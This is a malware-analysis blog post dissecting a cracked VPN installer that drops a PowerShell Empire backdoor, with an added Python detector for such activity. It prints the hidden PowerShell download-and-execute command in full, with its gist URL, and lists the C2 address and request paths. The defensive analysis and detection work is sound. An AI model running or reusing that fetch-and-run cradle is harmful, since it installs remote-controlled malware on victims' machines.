Monday 11 December 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to do my bit for internet safety. I'm just a small drop in the ocean, but I'm here!
Today I will introduce you to something different.
As usual, I downloaded a few pieces of software and started the analysis.
I have a "great offer":
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.


Note that it is the most recently created file.

Also, the installation method requires using this file.

OK. Let's scan this time!

VirusTotal report

20/68 detections?!?
I mean, only 20 of the 68 antivirus engines see this file as a virus.

OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.

Let’s get started

It looks like this .exe is actually a .rar archive

After opening, it does a lot of work in the background.
We let it do its job so we can find out what it is doing!

When everything is quiet, we see that something is still running.

powershell.exe -nop -windowstyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1')"

The malware runs through powershell.exe and connects to external sources to fetch its code:

h**ps://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

It also connects to http://83.251.132.4 on the following paths:

  • /admin/get.php
  • /login/process.php
  • /news.php
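As an added example (my own code, not part of the original post), here is a small Python detector for the two things observed above: the PowerShell download cradle in the process command line, and HTTP requests to the three request paths. The sample log lines are constructed, and the gist URL inside them is a placeholder rather than the real one.

```python
import re

# Indicators of a PowerShell download cradle, taken from the command line
# observed above: no profile, hidden window, IEX of a string fetched over HTTP.
CRADLE_INDICATORS = {
    "no_profile":    re.compile(r"(?i)(^|\s)-nop(rofile)?\b"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden\b"),
    "invoke_expr":   re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "web_download":  re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile"),
}

# Request paths seen in this sample (they are also the stock URIs of the
# PowerShell Empire HTTP listener profile).
EMPIRE_URIS = {"/admin/get.php", "/login/process.php", "/news.php"}

def cradle_indicators(cmdline: str) -> list[str]:
    """Return the names of every cradle indicator present in a command line."""
    return [name for name, rx in CRADLE_INDICATORS.items() if rx.search(cmdline)]

def is_download_cradle(cmdline: str) -> bool:
    """High-confidence rule: code is fetched remotely AND handed to IEX."""
    return {"invoke_expr", "web_download"} <= set(cradle_indicators(cmdline))

def flag_http_requests(log_lines: list[str]) -> list[tuple[str, str]]:
    """Parse constructed 'src_ip METHOD url' lines and return the (src_ip, url)
    pairs whose request path is one of the Empire default URIs."""
    flagged = []
    for line in log_lines:
        src, _method, url = line.split()
        path = re.sub(r"^https?://[^/]+", "", url)   # strip scheme and host
        if path in EMPIRE_URIS:
            flagged.append((src, url))
    return flagged

# Constructed sample data (not real telemetry); the gist URL is a placeholder.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -windowstyle Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('https://gist.githubusercontent.com/EXAMPLE/raw/x.ps1')\"",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]
SAMPLE_HTTP_LOG = [
    "10.0.0.15 GET http://83.251.132.4/admin/get.php",
    "10.0.0.15 POST http://83.251.132.4/login/process.php",
    "10.0.0.22 GET http://intranet.example/news/index.html",
]

if __name__ == "__main__":
    for cl in SAMPLE_CMDLINES:
        print(is_download_cradle(cl), cradle_indicators(cl))
    print(flag_http_requests(SAMPLE_HTTP_LOG))
```

The cradle rule keys on IEX plus a remote fetch rather than on the gist URL, so it still fires when the hosting location changes; the URI rule is cheap to run over proxy logs but should be paired with the host check, since the paths alone are generic.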

After investigating, I found out that it is a PowerShell Empire payload.

Currently PowerShell Empire has the following categories of modules:

  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxiliary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz

Prodefence.org

What can I say... be careful!

Have fun & stay safe!!!


Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer –
Malware Reverse Engineering Researcher


2 thoughts on “Malware research/reverse – Payload backdoor

Leave a Reply

Your email address will not be published. Required fields are marked *